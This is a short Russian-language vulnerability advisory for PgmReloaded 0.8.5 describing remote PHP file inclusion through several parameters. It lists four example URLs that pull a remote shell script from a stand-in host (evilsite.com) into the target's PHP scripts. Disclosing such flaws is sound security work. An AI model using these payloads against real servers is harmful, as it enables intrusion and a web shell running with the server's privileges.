Программа: PgmReloaded 0.8.5

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре "lang", "CFG[libdir]", "CFG[localedir]" и " errormsg " различными сценариями. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

Пример:

http://[target]/[path]/index.php?lang=http://evilsite.com/shell.php?

http://[target]/[path]/common.inc.php?CFG[libdir]=http://evilsite.com/shell.php?

http://[target]/[path]/common.inc.php?CFG[localedir]=http://evilsite.com/shell.php?

http://[target]/[path]/form_header.php?errormsg=1&CFG[localelangdir]=http://evilsite.com/shell.php?



Оставить мнение